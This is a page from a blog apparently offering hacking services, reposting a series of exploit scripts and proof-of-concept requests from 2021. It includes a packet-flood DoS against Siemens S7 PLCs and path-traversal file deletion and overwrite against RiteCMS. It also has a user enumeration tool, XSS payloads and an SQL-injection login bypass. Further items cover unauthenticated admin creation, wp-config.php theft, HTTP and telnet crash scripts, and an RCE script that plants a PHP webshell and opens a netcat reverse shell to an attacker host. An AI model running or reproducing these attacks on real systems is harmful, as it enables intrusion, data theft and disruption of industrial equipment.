Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863134085

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS)
# Date: 21/10/2021
# Exploit Author: RoseSecurity
# Vendor Homepage: https://www.siemens.com/us/en.html
# Version: Firmware versions >= 3
# Tested on: Siemens S7-300, S7-400 PLCs


#!/usr/bin/python3

from scapy.all import *
from colorama import Fore, Back, Style
from subprocess import Popen, PIPE
from art import *
import threading
import subprocess
import time
import os
import sys
import re

# Banner

print(Fore.RED + r"""

 ▄▄▄· ▄• ▄▌▄▄▄▄▄      • ▌ ▄ ·.  ▄▄▄· ▄▄▄▄▄      ▄▄▄   
▐█ ▀█ ███▌•██       ·██ ▐███▐█ ▀█ •██       ▀▄ █· 
▄█▀▀█ █▌▐█▌ ▐█. ▄█▀▄ ▐█ ▌▐▌▐█·▄█▀▀█  ▐█. ▄█▀▄ ▐▀▀▄  
▐█ ▐▌▐█▄█▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌▐█ ▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ 
 ▀  ▀  ▀▀▀  ▀▀▀  ▀█▄▀▀▀  █▀▀▀ ▀  ▀  ▀▀▀  ▀█▄▀.▀  ▀ 
▄▄▄▄▄▄▄▄ .▄▄▄  • ▌ ▄ ·.    ▐ ▄  ▄▄▄· ▄▄▄▄▄      ▄▄▄  
•██  ▀▄.▀·▀▄ █··██ ▐█████ •█▌▐█▐█ ▀█ •██       ▀▄ █·
 ▐█.▐▀▀▄▐▀▀▄ ▐█ ▌▐▌▐█·▐█·▐█▐▐▌▄█▀▀█  ▐█. ▄█▀▄ ▐▀▀▄ 
 ▐█▌·▐█▄▄▌▐█•█▌██ ██▌▐█▌▐█▌██▐█▌▐█ ▐▌ ▐█▌·▐█▌.▐▌▐█•█▌
 ▀▀▀  ▀▀▀ .▀  ▀▀▀  █▀▀▀▀▀▀▀▀ █ ▀  ▀  ▀▀▀  ▀█▄▀.▀  ▀
                """)

time.sleep(1.5)

# Get IP to exploit

IP = input("Enter the IP address of the device to exploit: ")

# Find the mac address of the device

Mac = getmacbyip(IP)

# Function to send the ouput to "nothing"

def NULL ():

    f = open(os.devnull, 'w')
    sys.stdout = f

# Eternal loop to produce DoS condition

def Arnold ():

    AutomatorTerminator = True

    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()
def Sarah ():

    AutomatorTerminator = True

    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()
def Kyle ():
    AutomatorTerminator = True

    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()

# Arnold
ArnoldThread = threading.Thread(target=Arnold)
ArnoldThread.start()
ArnoldThread.join()
NULL()

# Sarah

SarahThread = threading.Thread(target=Sarah)
SarahThread.start()
SarahThread.join()
NULL()

# Kyle

KyleThread = threading.Thread(target=Kyle)
KyleThread.start()
KyleThread.join()
NULL()
HireHackking 
# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Reference: https://gist.github.com/faisalfs10x/5514b3eaf0a108e27f45657955e539fd


################
# Description  #
################

# RiteCMS version 3.1.0 and below suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.


#####################################################
# PoC to delete secretConfig.conf file in web root  #
#####################################################


Steps to Reproduce:

1. Login as admin
2. Go to File Manager
3. Delete any file
4. Intercept the request and replace current file name to any files on the server via parameter "delete".

# Assumed there is a secretConfig.conf file in web root

PoC: param delete - Deleting secretConfig.conf file in web root, so the payload will be "../secretConfig.conf"

Request:
========

GET /ritecms.v3.1.0/admin.php?mode=filemanager&directory=media&delete=../secretConfig.conf&confirmed=true HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
HireHackking 
# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Reference: https://gist.github.com/faisalfs10x/4a3b76f666ff4c0443e104c3baefb91b


################
# Description  #
################

# RiteCMS version 3.1.0 and below suffers from an arbitrary file overwrite vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to overwrite any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to write). Furthermore, an attacker might leverage the capability of arbitrary file overwrite to modify existing file such as /etc/passwd or /etc/shadow if the current PHP process user is run as root.


############################################################
# PoC to overwrite existing index.php to display phpinfo() #
############################################################


Steps to Reproduce:

1. Login as admin
2. Go to File Manager
3. Then, click Upload file > Browse.. 
4. Upload any file and click checkbox name "overwrite file with same name"
4. Intercept the request and replace current file name to any files path on the server via parameter "file_name".


PoC: param file_name - to overwrite index.php to display phpinfo, so the payload will be "../index.php"
	 param filename - with the content of "<?php phpinfo(); ?>"

Request:
========

POST /ritecmsv3.1.0/admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------351719865731412638493510448298
Content-Length: 1840
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://192.168.8.143/ritecmsv3.1.0/admin.php?mode=filemanager&action=upload&directory=media
Cookie: PHPSESSID=nuevl0lgkrc3dv44g3vgkoqqre
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="mode"

filemanager
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="file"; filename="anyfile.txt"
Content-Type: application/octet-stream

content of the file to overwrite here
-- this is example to overwrite index.php to display phpinfo --
<?php phpinfo(); ?>
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="directory"

media
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="file_name"

../index.php
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="overwrite_file"

true
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="upload_mode"

1
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="resize_xy"

x
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="resize"

640
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="compression"

80
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_resize_xy"

x
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_resize"

150
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_compression"

70
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="upload_file_submit"

OK - Upload file
-----------------------------351719865731412638493510448298--
HireHackking 
# Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration
# Date: 17/12/2021
# Exploit Author: Luca Cuzzolin aka czz78
# Vendor Homepage: https://www.connectwise.com/
# Version: vulnerable <= 19.2.24707
# CVE : CVE-2019-16516

# https://github.com/czz/ScreenConnect-UserEnum

from multiprocessing import Process, Queue
from statistics import mean
from urllib3 import exceptions as urlexcept
import argparse
import math
import re
import requests

class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKCYAN = '\033[96m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


headers = []

def header_function(header_line):
    headers.append(header_line)


def process_enum(queue, found_queue, wordlist, url, payload, failstr, verbose, proc_id, stop, proxy):
    try:
        # Payload to dictionary
        payload_dict = {}
        for load in payload:
            split_load = load.split(":")
            if split_load[1] != '{USER}':
                payload_dict[split_load[0]] = split_load[1]
            else:
                payload_dict[split_load[0]] = '{USER}'

        # Enumeration
        total = len(wordlist)
        for counter, user in enumerate(wordlist):
            user_payload = dict(payload_dict)
            for key, value in user_payload.items():
                if value == '{USER}':
                    user_payload[key] = user

            dataraw = "".join(['%s=%s&' % (key, value) for (key, value) in user_payload.items()])[:-1]
            headers={"Accept": "*/*" , "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}

            req = requests.request('POST',url,headers=headers,data=dataraw, proxies=proxies)

            x = "".join('{}: {}'.format(k, v) for k, v in req.headers.items())

            if re.search(r"{}".format(failstr), str(x).replace('\n','').replace('\r','')):
                queue.put((proc_id, "FOUND", user))
                found_queue.put((proc_id, "FOUND", user))
                if stop: break
            elif verbose:
                queue.put((proc_id, "TRIED", user))
            queue.put(("PERCENT", proc_id, (counter/total)*100))

    except (urlexcept.NewConnectionError, requests.exceptions.ConnectionError):
        print("[ATTENTION] Connection error on process {}! Try lowering the amount of threads with the -c parameter.".format(proc_id))


if __name__ == "__main__":
    # Arguments
    parser = argparse.ArgumentParser(description="http://example.com/Login user enumeration tool")
    parser.add_argument("url", help="http://example.com/Login")
    parser.add_argument("wordlist", help="username wordlist")
    parser.add_argument("-c", metavar="cnt", type=int, default=10, help="process (thread) count, default 10, too many processes may cause connection problems")
    parser.add_argument("-v", action="store_true", help="verbose mode")
    parser.add_argument("-s", action="store_true", help="stop on first user found")
    parser.add_argument("-p", metavar="proxy", type=str, help="socks4/5 http/https proxy, ex: socks5://127.0.0.1:9050")
    args = parser.parse_args()

    # Arguments to simple variables
    wordlist = args.wordlist
    url = args.url
    payload = ['ctl00%24Main%24userNameBox:{USER}', 'ctl00%24Main%24passwordBox:a', 'ctl00%24Main%24ctl05:Login', '__EVENTTARGET:', '__EVENTARGUMENT:', '__VIEWSTATE:']
    verbose = args.v
    thread_count = args.c
    failstr = "PasswordInvalid"
    stop = args.s
    proxy= args.p

    print(bcolors.HEADER + """
      __   ___  __     ___
|  | |__  |__  |__)   |__  |\ | |  | |\/|
|__| ___| |___ |  \   |___ | \| |__| |  |

ScreenConnect POC by czz78 :)

    """+ bcolors.ENDC);
    print("URL: "+url)
    print("Payload: "+str(payload))
    print("Fail string: "+failstr)
    print("Wordlist: "+wordlist)
    if verbose: print("Verbose mode")
    if stop: print("Will stop on first user found")

    proxies = {'http': '', 'https': ''}
    if proxy:
        proxies = {'http': proxy, 'https': proxy}

    print("Initializing processes...")
    # Distribute wordlist to processes
    wlfile = open(wordlist, "r", encoding="ISO-8859-1")  # or utf-8
    tothread = 0
    wllist = [[] for i in range(thread_count)]
    for user in wlfile:
        wllist[tothread-1].append(user.strip())
        if (tothread < thread_count-1):
            tothread+=1
        else:
            tothread = 0

    # Start processes
    tries_q = Queue()
    found_q = Queue()
    processes = []
    percentage = []
    last_percentage = 0
    for i in range(thread_count):
        p = Process(target=process_enum, args=(tries_q, found_q, wllist[i], url, payload, failstr, verbose, i, stop, proxy))
        processes.append(p)
        percentage.append(0)
        p.start()

    print(bcolors.OKBLUE + "Processes started successfully! Enumerating." + bcolors.ENDC)
    # Main process loop
    initial_count = len(processes)
    while True:
        # Read the process output queue
        try:
            oldest = tries_q.get(False)
            if oldest[0] == 'PERCENT':
                percentage[oldest[1]] = oldest[2]
            elif oldest[1] == 'FOUND':
                print(bcolors.OKGREEN + "[{}] FOUND: {}".format(oldest[0], oldest[2]) + bcolors.ENDC)
            elif verbose:
                print(bcolors.OKCYAN + "[{}] Tried: {}".format(oldest[0], oldest[2]) + bcolors.ENDC)
        except: pass

        # Calculate completion percentage and print if /10
        total_percentage = math.ceil(mean(percentage))
        if total_percentage % 10 == 0 and total_percentage != last_percentage:
            print("{}% complete".format(total_percentage))
            last_percentage = total_percentage

        # Pop dead processes
        for k, p in enumerate(processes):
            if p.is_alive() == False:
                processes.pop(k)

        # Terminate all processes if -s flag is present
        if len(processes) < initial_count and stop:
            for p in processes:
                p.terminate()

        # Print results and terminate self if finished
        if len(processes) == 0:
            print(bcolors.OKBLUE + "EnumUser finished, and these usernames were found:" + bcolors.ENDC)
            while True:
                try:
                    entry = found_q.get(False)
                    print(bcolors.OKGREEN + "[{}] FOUND: {}".format(entry[0], entry[2]) + bcolors.ENDC)
                except:
                    break
            quit()
HireHackking
# Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) # Date: 22/12/2021 # Exploit Author: gx1 <gaetano.perrone[at]secsi.io> # Vulnerability Discovery: Gaetano Perrone # Vendor Homepage: https://www.crmperks.com/ # Software Link: https://wordpress.org/plugins/contact-form-entries/ # Version: < 1.1.7 # Tested on: any # References: * https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac * https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/ # Description: Contact Form Entries < 1.1.7 is vulnerable to Unauthenticated Stored Cross-Site Scripting # Technical Details and Exploitation: CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field. When the user uploads a new form, CRM Form Entries checks for the client IP in order to save information about the user: =============================================================================================================== public function get_ip(), wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388 ============================================================================================================== The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is stored inside the database. # Proof Of Concept: Suppose that you have a Contact Form, intercept the POST request and insert the following Client-IP header =============================================================================================================== POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1 Host: dsp.com:11080 Content-Length: 1411 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ... Client-IP: <img src=a onerror=alert(1)> ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7" 10 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_version" 5.3.1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_locale" en_US ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_unit_tag" wpcf7-f10-p13-o1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_container_post" Content-Disposition: form-data; name="_wpcf7" 10 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_version" 5.3.1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_locale" en_US ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_unit_tag" wpcf7-f10-p13-o1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_container_post" ... =============================================================================================================== The request is acccepted, and the code navigates the section $_SERVER['HTTP_CLIENT_IP'] , ip is injected and saved inside the database. When the administrator clicks on the entry element in the plugin, the XSS is triggered. # Solution: Upgrade Contact Form Entries to version 1.1.7
HireHackking
# Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS) # Discovered by: Yehia Elghaly # Discovered Date: 22/12/2021 # Vendor Homepage: https://www.accu-time.com/ # Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/ # Tested Version: 1.0 # Vulnerability Type: Buffer Overflow (DoS) Remote # Tested on OS: linux # Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow # Steps to reproduce: # 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23 # 2. - Run the Script from remote PC/IP # 3. - Telnet Crashed #!/usr/bin/env python3 import socket import sys print("#######################################################") print("# Accu-Time Systems MAXIMUS Remote (BUffer Overflow) #") print("# -------------------------- #") print("# BY Yehia Elghaly #") print("#######################################################") if (len(sys.argv)<2): print ("Usage: %s <Target Host> ") % sys.argv[0] print ("Example: %s 192.168.113.1 ") % sys.argv[0] exit(0) print ("\nSending Evil.......Buffer...") s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((sys.argv[1], 23)) buffer = "A"*9400 s.send(" Crashed Check the connection") Print ("Crashed") except: print ("Could not connect to ACCU Time Telnet!")
HireHackking
# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 23/12/2021 # Exploit Author: Jeremiasz Pluta # Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System # Software Link: https://github.com/rskoolrash/Online-Admission-System # Tested on: LAMP Stack (Debian 10) #!/usr/bin/python import sys import re import argparse import requests import time import subprocess print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)') path = '/' #change me if the path to the /oas is in the root directory or another subdir class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): payload = """<?php system($_GET['cmd']); ?>""" payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" url = 'http://' + target_ip + ':' + target_port + path r = requests.Session() print('[*] Resolving URL...') r1 = r.get(url + 'documents.php') time.sleep(3) #Upload the payload file print('[*] Uploading the webshell payload...') files = { 'fpic': ('cmd.php', payload + '\n', 'application/x-php'), 'ftndoc': ('', '', 'application/octet-stream'), 'ftcdoc': ('', '', 'application/octet-stream'), 'fdmdoc': ('', '', 'application/octet-stream'), 'ftcdoc': ('', '', 'application/octet-stream'), 'fdcdoc': ('', '', 'application/octet-stream'), 'fide': ('', '', 'application/octet-stream'), 'fsig': ('', '', 'application/octet-stream'), } data = {'fpicup':'Submit Query'} r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data) time.sleep(3) print('[*] Setting up netcat listener...') listener = subprocess.Popen(["nc", "-nvlp", self.localport]) time.sleep(3) print('[*] Spawning reverse shell...') print('[*] Watchout!') r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2) time.sleep(3) if (r3.status_code == 200): print('[*] Got shell!') while True: listener.wait() else: print('[-] Something went wrong!') listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()
HireHackking
# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) # Date: 22/12/2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html # Version: 1.0 # Tested on: Windows import requests import json url = input('Url:') if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" Username = "tago" Password = "tagoletta" reqUrl = url + "classes/Users.php?f=save" reqHeaders = { "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Origin": url} reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n" resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) if resp.status_code == 200: print("Admin account created") reqUrl = url + "classes/Login.php?f=login" reqHeaders = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Origin": url } reqData = {"username": ""+Username+"", "password": ""+Password+""} resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) data = json.loads(resp.text) status = data["status"] if status == "success": print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password) else: print("Exploited but not loginned") else: print("Not injectable")
HireHackking
# Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) # Date: 23/12/2021 # Exploit Authors: Nicole Sheinin, Liad Levy # Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/ # Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/ # Version: versions <= 2.2.2 # Tested on: MacOS # CVE: CVE-2021-39312 # Github repo: #!/usr/bin/env python3 import argparse, textwrap import requests import sys parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter) group_must = parser.add_argument_group('must arguments') group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True) parser.add_argument("-p","--payload", help="Path to read [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False) args = parser.parse_args() if len(sys.argv) <= 2: print (f"Exploit Usage: ./exploit.py -h [help] -u [url]") sys.exit() HOST = args.url PAYLOAD = args.payload url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST) payload = "/scripts/simple.php/{}".format(PAYLOAD) r = requests.post(url,data={'src': payload}) if r.status_code == 200: print(r.text) else: print("No exploit found")
HireHackking

Nettmp NNT 5.1 - SQLi Authentication Bypass

HACKER · %s · %s

# Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass # Date: 23/12/2021 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://wiki.nettemp.tk # Software Link: https://wiki.nettemp.tk # Version: nettmp NNT # Tested on: Linux (Ubuntu 20.04) Payload: username: 1' or 1=1;-- password: \ Proof of Concept: POST /index.php?id=status HTTP/1.1 Host: vuln.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: http://vuln.com DNT: 1 Connection: close Referer: http://vulnIP/index.php?id=status Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq Upgrade-Insecure-Requests: 1 username=1%27+or+1%3D1%3B--&password=%5C&form_login=log
HireHackking

AWebServer GhostBuilding 18 - Denial of Service (DoS)

HACKER · %s · %s

# Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS) # Date: 28/12/2021 # Exploit Author: Andres Ramos [Invertebrado] # Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm # Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en # Version: AWebServer GhostBuilding 18 # Tested on: Android #!/usr/bin/python3 # ********************************************************************************* # * Author: Andres Ramos [Invertebrado] * # * AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash * # ********************************************************************************* import signal import requests from pwn import * #Colors class colors(): GREEN = "\033[0;32m\033[1m" END = "\033[0m" RED = "\033[0;31m\033[1m" BLUE = "\033[0;34m\033[1m" YELLOW = "\033[0;33m\033[1m" PURPLE = "\033[0;35m\033[1m" TURQUOISE = "\033[0;36m\033[1m" GRAY = "\033[0;37m\033[1m" exit = False def def_handler(sig, frame): print(colors.RED + "\n[!] Exiting..." + colors.END) exit = True sys.exit(0) if threading.activeCount() > 1: os.system("tput cnorm") os._exit(getattr(os, "_exitcode", 0)) else: os.system("tput cnorm") sys.exit(getattr(os, "_exitcode", 0)) signal.signal(signal.SIGINT, def_handler) if len(sys.argv) < 3: print(colors.RED + "\n[!] Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED +">" + colors.END) sys.exit(1) url = sys.argv[1] Tr = sys.argv[2] def http(): counter = 0 p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END) while True: r = requests.get(url) r = requests.get(url + "/mysqladmin") counter += 2 p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END) if exit: break if __name__ == '__main__': threads = [] try: for i in range(0, int(Tr)): t = threading.Thread(target=http) threads.append(t) sys.stderr = open("/dev/null", "w") for x in threads: x.start() for x in threads: x.join() except Exception as e: log.failure(str(e)) sys.exit(1)
HireHackking
# Exploit Title: BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated) # Google Dork: intext:"BeyondTrust" "Redistribution Prohibited" # Date: 30/12/2021 # Exploit Author: Malcrove # Vendor Homepage: https://www.beyondtrust.com/ # Version: v6.0 and earlier versions Summary: Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint. Vulnerability Details: Affected Endpoint: /appliance/login Affected Parameter: login[password] Request Method: GET or POST Proof of concept (POC): By navigating to the below link from a modern web browser, alert(document.domain) Javascript method would be fired in the same context of Beyondtrust Remote Support domain. http://<bomgar-host>/appliance/login?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password Mitigation: A fix has been released by the vendor in NSBase 6.1. It's recommended to update the vulnerable appliance base version to the latest version. - Time-Line: April 6, 2021: Vulnerability advisory sent to the vendor (Beyondtrust) April 8, 2021: Recevied an initial reply from the vendor Jun 10, 2021: The vendor released a fix for the vulnerability in NSbase 6.1 Dec 30, 2021: The Responsible public disclosure - Credits Ahmed Aboul-Ela (Malcrove)
HireHackking

TRIGONE Remote System Monitor 3.61 - Unquoted Service Path

HACKER · %s · %s

